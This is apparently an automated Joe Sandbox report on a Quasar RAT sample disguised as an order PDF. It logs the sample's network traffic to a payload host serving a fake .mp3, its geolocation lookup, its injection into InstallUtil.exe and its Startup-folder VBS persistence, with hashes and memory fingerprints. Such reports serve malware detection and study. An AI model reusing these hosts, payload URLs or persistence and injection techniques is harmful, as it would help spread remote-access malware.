Nov 18, 2024 08:17:08.153294086 CET | 51943 | 53 | 192.168.2.4 | 1.1.1.1
Nov 18, 2024 08:17:08.161777973 CET | 53 | 51943 | 1.1.1.1 | 192.168.2.4
Nov 18, 2024 08:17:45.384815931 CET | 53 | 62662 | 162.159.36.2 | 192.168.2.4
Nov 18, 2024 08:17:46.029077053 CET | 53 | 54832 | 1.1.1.1 | 192.168.2.4
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Nov 18, 2024 08:16:59.584736109 CET | 192.168.2.4 | 1.1.1.1 | 0x114f | Standard query (0) | www.oleonidas.gr | A (IP address) | IN (0x0001) | false
Nov 18, 2024 08:17:05.470633984 CET | 192.168.2.4 | 1.1.1.1 | 0x61fc | Standard query (0) | new-visit.com | A (IP address) | IN (0x0001) | false
Nov 18, 2024 08:17:08.153294086 CET | 192.168.2.4 | 1.1.1.1 | 0x712c | Standard query (0) | ipwho.is | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Nov 18, 2024 08:16:59.828737974 CET | 1.1.1.1 | 192.168.2.4 | 0x114f | No error (0) | www.oleonidas.gr | oleonidas.gr |  | CNAME (Canonical name) | IN (0x0001) | false
Nov 18, 2024 08:16:59.828737974 CET | 1.1.1.1 | 192.168.2.4 | 0x114f | No error (0) | oleonidas.gr |  | 185.78.221.73 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 08:17:05.751359940 CET | 1.1.1.1 | 192.168.2.4 | 0x61fc | No error (0) | new-visit.com |  | 72.11.156.80 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 08:17:07.147557974 CET | 1.1.1.1 | 192.168.2.4 | 0x993b | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.214.172 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 08:17:07.147557974 CET | 1.1.1.1 | 192.168.2.4 | 0x993b | No error (0) | bg.microsoft.map.fastly.net |  | 199.232.210.172 | A (IP address) | IN (0x0001) | false
Nov 18, 2024 08:17:08.161777973 CET | 1.1.1.1 | 192.168.2.4 | 0x712c | No error (0) | ipwho.is |  | 195.201.57.90 | A (IP address) | IN (0x0001) | false
                                                                      • www.oleonidas.gr
                                                                      • ipwho.is
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.4 | 49730 | 185.78.221.73 | 443 | 180 | C:\Users\user\Desktop\Order88983273293729387293828PDF.exe
Timestamp | Bytes transferred | Direction | Data
2024-11-18 07:17:00 UTC | 86 | OUT | GET /slim/Wyaiccfynhd.mp3 HTTP/1.1
Host: www.oleonidas.gr
Connection: Keep-Alive
2024-11-18 07:17:01 UTC | 300 | IN | HTTP/1.1 200 OK
                                                                      Date: Mon, 18 Nov 2024 07:17:01 GMT
                                                                      Server: Apache
                                                                      Last-Modified: Mon, 18 Nov 2024 00:17:26 GMT
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 2120192
                                                                      Cache-Control: max-age=1209600
                                                                      Expires: Mon, 02 Dec 2024 07:17:01 GMT
                                                                      Vary: User-Agent
                                                                      Connection: close
                                                                      Content-Type: audio/mpeg
                                                                      Data Ascii: 0E!Y #(i.)R Y!")h. SQ!Y #&i/SP Y!"P"001s $X,111"x101c216111/ .8!h+010e3177101 +.E111b207m310&"U301011x101h?&0=011110u011i?1q310*101!110i>&12101c216O
                                                                      2024-11-18 07:17:01 UTC8000INData Raw: 31 ce 38 33 30 5e fa 30 31 3b 1a 31 2f 30 19 9d 32 31 37 1a 6b cf 39 31 31 ce 38 30 30 cf 38 32 31 cf 39 32 31 5f 69 31 30 3b 1b 30 1b cf 39 31 31 5f fd 31 30 3b 1b 30 1f 31 ce 38 31 30 19 9c 32 31 37 1a 1b cf 39 31 31 5f f7 31 30 3b 1b 30 1b cf 39 31 31 5f fc 31 30 3b 1b 30 0f 31 ce 38 31 30 cf 38 31 31 19 fe 31 31 3a 1b 27 24 25 cf 31 1b 31 30 3b 25 1a 31 2f 30 19 90 33 31 37 1a 1f 31 ce 38 31 30 19 57 30 31 3b 1a 1f 31 ce 38 31 30 19 50 30 31 3b 1a 1b cf 39 31 31 5f 88 31 30 3b 1b 30 1b cf 39 31 31 5f f6 31 30 3b 1b 30 2f 31 18 fe 31 30 3b 1b 1e 31 cf 39 31 31 18 e1 31 30 3b 1b 1e 31 cf 39 31 31 18 8b 31 30 3b 1b 0a cf 38 30 31 cf 39 30 31 5f 73 31 30 3b 1b 30 1b cf 39 31 31 5f 49 32 30 37 1b 30 0b cf 39 31 31 ce 38 30 30 5e 6a 30 31 3b 1a 31 1b ce 38
                                                                      Data Ascii: 1830^01;1/0217k911800821921_i10;0911_10;01810217911_10;0911_10;0181081111:'$%110;%1/03171810W01;1810P01;911_10;0911_10;0/110;191110;191110;801901_s10;0911_I2070911800^j01;18
                                                                      2024-11-18 07:17:01 UTC8000INData Raw: 31 11 0c 31 31 30 68 ad 10 93 30 30 31 09 03 dd ce cf cf 3d 14 31 11 3b 31 31 30 11 ff 30 31 31 10 75 31 30 31 68 ac 11 30 31 31 31 08 25 dd cf ce cf 3c 15 31 10 26 31 30 31 cf 3c 13 31 ac 11 da 30 31 31 08 cd da cf ce 20 24 26 69 23 25 11 5a 31 31 30 cf 3f 33 31 09 d4 da ce cf 11 a3 30 31 31 10 10 31 30 31 69 ce 3f 13 30 11 b6 30 31 31 18 8e 32 30 37 08 fa da ce cf 17 11 1f 31 31 30 09 8e db ce ce ce 3d 15 30 11 2a 30 31 31 10 21 31 30 31 11 3d 31 31 30 68 ad 10 7b 31 30 31 09 90 da ce cf cf 3d 14 31 11 24 31 31 30 cf 3d 12 31 ad 10 88 31 30 31 09 b8 da ce cf cf 3d 14 31 11 2e 31 31 30 11 f2 30 31 31 10 70 31 30 31 68 ac 11 18 30 31 31 08 58 da cf ce 11 43 31 31 30 11 7b 30 31 31 68 cf 3f 12 31 11 18 31 31 30 19 8f 33 31 37 09 7a da cf ce 17 10 73 31 30
                                                                      Data Ascii: 1110h001=1;110011u101h0111%<1&101<1011 $&i#%Z110?31011101i?0011207110=0*011!101=110h{101=1$110=1101=1.110011p101h011XC110{011h?1110317zs10


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      1 | 192.168.2.4 | 49733 | 195.201.57.90 | 443 | 3624 | C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-11-18 07:17:09 UTC | 150 | OUT | GET / HTTP/1.1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:76.0) Gecko/20100101 Firefox/76.0
                                                                      Host: ipwho.is
                                                                      Connection: Keep-Alive
                                                                      2024-11-18 07:17:09 UTC | 223 | IN | HTTP/1.1 200 OK
                                                                      Date: Mon, 18 Nov 2024 07:17:09 GMT
                                                                      Content-Type: application/json; charset=utf-8
                                                                      Transfer-Encoding: chunked
                                                                      Connection: close
                                                                      Server: ipwhois
                                                                      Access-Control-Allow-Headers: *
                                                                      X-Robots-Tag: noindex
                                                                      2024-11-18 07:17:09 UTC | 1033 | IN | Data Ascii: 3fd{ "About Us": "https:\/\/ipwhois.io", "ip": "155.94.241.187", "success": true, "type": "IPv4", "continent": "North America", "continent_code": "NA", "country": "United States", "country_code": "US", "region": "Texa


                                                                      Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                      2 | 192.168.2.4 | 49734 | 185.78.221.73 | 443 | 1344 | C:\Users\user\AppData\Roaming\MaxGeneration.exe
                                                                      Timestamp | Bytes transferred | Direction | Data
                                                                      2024-11-18 07:17:14 UTC | 86 | OUT | GET /slim/Wyaiccfynhd.mp3 HTTP/1.1
                                                                      Host: www.oleonidas.gr
                                                                      Connection: Keep-Alive
                                                                      2024-11-18 07:17:15 UTC | 300 | IN | HTTP/1.1 200 OK
                                                                      Date: Mon, 18 Nov 2024 07:17:14 GMT
                                                                      Server: Apache
                                                                      Last-Modified: Mon, 18 Nov 2024 00:17:26 GMT
                                                                      Accept-Ranges: bytes
                                                                      Content-Length: 2120192
                                                                      Cache-Control: max-age=1209600
                                                                      Expires: Mon, 02 Dec 2024 07:17:14 GMT
                                                                      Vary: User-Agent
                                                                      Connection: close
                                                                      Content-Type: audio/mpeg


                                                                      Target ID:0
                                                                      Start time:02:16:58
                                                                      Start date:18/11/2024
                                                                      Path:C:\Users\user\Desktop\Order88983273293729387293828PDF.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\Desktop\Order88983273293729387293828PDF.exe"
                                                                      Imagebase:0x320000
                                                                      File size:1'484'288 bytes
                                                                      MD5 hash:ABBFB2B5EBF6A24EEF7269BDE8E80640
                                                                      Has elevated privileges:true
                                                                      Has administrator privileges:true
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1722029295.00000000028D8000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000000.00000002.1739089307.0000000006AA0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.1722029295.0000000002976000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.1740224733.00000000072F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000000.00000002.1726584671.0000000003C92000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:1
                                                                      Start time:02:17:02
                                                                      Start date:18/11/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                      Imagebase:0x220000
                                                                      File size:42'064 bytes
                                                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000002.2919597107.0000000002B1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000001.00000002.2919597107.000000000289C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:moderate
                                                                      Has exited:false

                                                                      Target ID:2
                                                                      Start time:02:17:12
                                                                      Start date:18/11/2024
                                                                      Path:C:\Windows\System32\wscript.exe
                                                                      Wow64 process (32bit):false
                                                                      Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\MaxGeneration.vbs"
                                                                      Imagebase:0x7ff7795a0000
                                                                      File size:170'496 bytes
                                                                      MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Reputation:high
                                                                      Has exited:true

                                                                      Target ID:3
                                                                      Start time:02:17:12
                                                                      Start date:18/11/2024
                                                                      Path:C:\Users\user\AppData\Roaming\MaxGeneration.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Users\user\AppData\Roaming\MaxGeneration.exe"
                                                                      Imagebase:0x7ff7699e0000
                                                                      File size:1'484'288 bytes
                                                                      MD5 hash:ABBFB2B5EBF6A24EEF7269BDE8E80640
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1884455692.0000000004C3E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000003.00000002.1861458458.0000000003548000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000003.00000002.1861458458.00000000035E3000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000003.00000002.1884455692.0000000004798000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      Antivirus matches:
                                                                      • Detection: 100%, Joe Sandbox ML
                                                                      • Detection: 32%, ReversingLabs
                                                                      Reputation:low
                                                                      Has exited:true

                                                                      Target ID:5
                                                                      Start time:02:17:16
                                                                      Start date:18/11/2024
                                                                      Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                      Wow64 process (32bit):true
                                                                      Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                                                                      Imagebase:0xd70000
                                                                      File size:42'064 bytes
                                                                      MD5 hash:5D4073B2EB6D217C19F2B22F21BF8D57
                                                                      Has elevated privileges:false
                                                                      Has administrator privileges:false
                                                                      Programmed in:C, C++ or other language
                                                                      Yara matches:
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.1890286903.0000000003131000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.1876763959.0000000000720000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      • Rule: JoeSecurity_Quasar, Description: Yara detected Quasar RAT, Source: 00000005.00000002.1876763959.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                      Reputation:moderate
                                                                      Has exited:true

                                                                      Reset < >
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 2d17b19622cec10aa9145251822949f434b78c5373308f01d1170aea40070cd4
                                                                        • Instruction ID: f4d0ae6e205c8ff4f07faa43bd2ce0e3ce1f7e6708984e9d733c5a609caf5fa2
                                                                        • Opcode Fuzzy Hash: 2d17b19622cec10aa9145251822949f434b78c5373308f01d1170aea40070cd4
                                                                        • Instruction Fuzzy Hash: AEC1F5B4E11218DFDB54DFAAD884B9DBBF2FB89300F14906AD509A7356DB346985CF00
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 26c02aa9f38d44756c0af762b74c5d1dd12bb3f26d1b7bf9e97ef499a68fd744
                                                                        • Instruction ID: e59914414d34b09d63436f1a5e60d94005cbfe5795ee1d47be76cb578f50703e
                                                                        • Opcode Fuzzy Hash: 26c02aa9f38d44756c0af762b74c5d1dd12bb3f26d1b7bf9e97ef499a68fd744
                                                                        • Instruction Fuzzy Hash: 49C1F570E11218DFDB54DFAAD884BADBBF2FB89300F14906AD509A7356EB346985CF00
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: d%dq$d%dq$$^q$$^q
                                                                        • API String ID: 0-141320698
                                                                        • Opcode ID: 657b240f8b635a5520cff3cd5dea54079d9822c55dc1b5c86c48a7229236ad5d
                                                                        • Instruction ID: 1f1c23a7c2d390316cdd80fe2be91f1e819cd839286342bb69d5e19a68a180ac
                                                                        • Opcode Fuzzy Hash: 657b240f8b635a5520cff3cd5dea54079d9822c55dc1b5c86c48a7229236ad5d
                                                                        • Instruction Fuzzy Hash: 2C51D330B403089BDB189A389C50B3B76E7BBD5710F26C929D606DB3E4DA31DD8187A1
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: TJcq$jjjjjj$$^q$$^q
                                                                        • API String ID: 0-672324049
                                                                        • Opcode ID: 886b736c8b166f5d8f04958d6c82816efde14b10f0308365695db1da875e90e4
                                                                        • Instruction ID: 64998ca32c6153059c3e3b2bcb432e587dfe759a195eb4bbd83e4cbba0268042
                                                                        • Opcode Fuzzy Hash: 886b736c8b166f5d8f04958d6c82816efde14b10f0308365695db1da875e90e4
                                                                        • Instruction Fuzzy Hash: E7B0929280E388DFCB035E9448C01627F60BA6224032EC4EAC8890F24BD015CA86E771
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $$/
                                                                        • API String ID: 0-2587683793
                                                                        • Opcode ID: 3c3b201a8235d0039284593a8bc4c3e8f51a5faeb8506a15f545cf506f42fbd7
                                                                        • Instruction ID: 562d59663dea41465f1d34f8684801f8f34e7db04e946b3d793dd432dcbaec0f
                                                                        • Opcode Fuzzy Hash: 3c3b201a8235d0039284593a8bc4c3e8f51a5faeb8506a15f545cf506f42fbd7
                                                                        • Instruction Fuzzy Hash: 42F0A4B490022ACFCB24DF14D988B98BBF1BB04305F1081EAD119A3692D335AAC4DF04
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: sq
                                                                        • API String ID: 0-1320738648
                                                                        • Opcode ID: c4df5ccde7888d457be3b01ed3b07c3b74dcc88ec509ace466cac6e82b86b69b
                                                                        • Instruction ID: 4a160ac8b5bc9f194fcb9905636525ec1acee972b44d099ba5492a129b8c7e27
                                                                        • Opcode Fuzzy Hash: c4df5ccde7888d457be3b01ed3b07c3b74dcc88ec509ace466cac6e82b86b69b
                                                                        • Instruction Fuzzy Hash: 97417870D0424C9FCB14DFA9C594AEEBFF1EF48304F198469E649AB354DB349945CBA0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1719810199.0000000000DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00DF0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_df0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: Te^q
                                                                        • API String ID: 0-671973202
                                                                        • Opcode ID: e4ad8b52e8eb280ecb2d07133dfeeebbd000823ef375024b31171c812171c22e
                                                                        • Instruction ID: e401adf945ace35603d4c0c9333f84b20f0f293b45e8ed40978ae371d0ea4fd0
                                                                        • Opcode Fuzzy Hash: e4ad8b52e8eb280ecb2d07133dfeeebbd000823ef375024b31171c812171c22e
                                                                        • Instruction Fuzzy Hash: 9E312938B00219CFCB08DFA9D958BADB7B1BF48705F158459EA06DB3A1CB709C42CB60
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !
                                                                        • API String ID: 0-2657877971
                                                                        • Opcode ID: be3706d48dd20c82f569cc8b5955831dc9adbd13c0b79578e745c78fa9004c6a
                                                                        • Instruction ID: ad97ac27dbd6cedf3f850dcc8ff98b6a2c030a136cf871c9e9ae90e08e5813ad
                                                                        • Opcode Fuzzy Hash: be3706d48dd20c82f569cc8b5955831dc9adbd13c0b79578e745c78fa9004c6a
                                                                        • Instruction Fuzzy Hash: 8A21F271E00218DFDB64CF65CC81BEDB7BABB48304F1081AAE60DA3350E774AA858F40
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 0
                                                                        • API String ID: 0-4108050209
                                                                        • Opcode ID: fe0ce633d9e6dacce1e4b1da3b0ed3c32dea479e6c16213c2657636dc2cee5bb
                                                                        • Instruction ID: fe887594f35fa324b4c0b9af60ce13e99cf39bca747bdc9225d7edecedbf224b
                                                                        • Opcode Fuzzy Hash: fe0ce633d9e6dacce1e4b1da3b0ed3c32dea479e6c16213c2657636dc2cee5bb
                                                                        • Instruction Fuzzy Hash: C5217EB4D10229DFDB61CF54D894BE9BBB1BB49304F0481E9E61DA7350E735AA81DF40
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: !
                                                                        • API String ID: 0-2657877971
                                                                        • Opcode ID: b850dd6462f7b352bbb9c2ca21d25ef1c8fc3b2cfe1a53c14d43acf3f9ee1dfc
                                                                        • Instruction ID: 6517e273907b1fda041078a7c73e6a9317f7bac2982e03a532be592c5ec4299f
                                                                        • Opcode Fuzzy Hash: b850dd6462f7b352bbb9c2ca21d25ef1c8fc3b2cfe1a53c14d43acf3f9ee1dfc
                                                                        • Instruction Fuzzy Hash: 85111571A0521DDFDB64CF65CC81BE9B7F9BB48700F1480AAE608A7350E730AA85CF50
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: 51206197b98d1c085b204e9e861c40c2793be1db305fa3fbe3c3e48dd119874b
                                                                        • Instruction ID: 572e4d540b596b53cd7aa44d3173daa3e4595b97a8bac140751ffdd8ee7529b2
                                                                        • Opcode Fuzzy Hash: 51206197b98d1c085b204e9e861c40c2793be1db305fa3fbe3c3e48dd119874b
                                                                        • Instruction Fuzzy Hash: C911CEB4A11229CFDB64DF54D990BADBBB1BF4A304F1040E9E609A7381DB316E81CF45
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: 13d552eb4694f2675526dad1bf4085a85869a054194a2eac4678dea4ed99df9d
                                                                        • Instruction ID: 08d8df186a8eea99481013631f99175e588995b897fed85b6d0ea87666f5aa9a
                                                                        • Opcode Fuzzy Hash: 13d552eb4694f2675526dad1bf4085a85869a054194a2eac4678dea4ed99df9d
                                                                        • Instruction Fuzzy Hash: 0D11B3B4A112298FDB64DF54D991B9DBBB1BF49300F1040E9E60DA7341DB316E81CF45
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: &
                                                                        • API String ID: 0-1010288
                                                                        • Opcode ID: c09516c77c449e23b054aef5d9d303e9c850c2b32600b4ea812bd9d70127e364
                                                                        • Instruction ID: 45ca7a5870d87b67444f168c43d4b497f4a6e3a78c09f1c4acff0b7f8b02e400
                                                                        • Opcode Fuzzy Hash: c09516c77c449e23b054aef5d9d303e9c850c2b32600b4ea812bd9d70127e364
                                                                        • Instruction Fuzzy Hash: C901D0B49042288FCB61CF54CC48BE9BBB1BB49304F0081D9D649A7351DBB6AEC1CF40
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: $
                                                                        • API String ID: 0-3993045852
                                                                        • Opcode ID: 99963ed969ece4c693508f4d4cf444da15d91966a0778d0e24e935b250f37168
                                                                        • Instruction ID: 8f924472e594ddfb56ffbccf47d7f373efde270159f0a74356e839a94272d2be
                                                                        • Opcode Fuzzy Hash: 99963ed969ece4c693508f4d4cf444da15d91966a0778d0e24e935b250f37168
                                                                        • Instruction Fuzzy Hash: C70124B190021EEBCF21DF54C850BD8BBB1FB48304F108699E60A73640EB31AA84DF84
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: 0d5829781c448894716a52ff803d57b645e864929e584fb4933331ede90e288a
                                                                        • Instruction ID: e5f70dba9e300a1414a013783cdb4528fd6d39bea4c45487d8c9184ba8eaf39d
                                                                        • Opcode Fuzzy Hash: 0d5829781c448894716a52ff803d57b645e864929e584fb4933331ede90e288a
                                                                        • Instruction Fuzzy Hash: D8E04F70905258CBEB158F25D924BA9B7F1BB05301F0050DACA46633C2D77409C9CF11
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: 6
                                                                        • API String ID: 0-498629140
                                                                        • Opcode ID: dd2ff2bc177224d3de029602fe8ec2184806c3dbb517723fc0cb89478539d069
                                                                        • Instruction ID: 4f9ffaf74e9055342a939161405a5f32bc4f35f5b63da70579ff5efdd8c4a124
                                                                        • Opcode Fuzzy Hash: dd2ff2bc177224d3de029602fe8ec2184806c3dbb517723fc0cb89478539d069
                                                                        • Instruction Fuzzy Hash: BDE09279A052299FCB14DF10CA84BD8BBB5AB48304F1480DA840DA7391D736AB86CF00
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1734608122.00000000047F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 047F0000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_47f0000_Order88983273293729387293828PDF.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID: 0-3916222277
                                                                        • Opcode ID: fc47432d0d112392a60f514f83eb8d36c2bf3320a851055eaa38da96b0e54dc3
                                                                        • Instruction ID: dd602736a9cdaae3bead6b58c14e069b938b68588cf28df77e21b37f203675a0
                                                                        • Opcode Fuzzy Hash: fc47432d0d112392a60f514f83eb8d36c2bf3320a851055eaa38da96b0e54dc3
                                                                        • Instruction Fuzzy Hash: 77D05E719051688BDB119F21DA24BA9BBB1FB45301F0010DA9A06633C6D6340A858F00
                                                                        Memory Dump Source
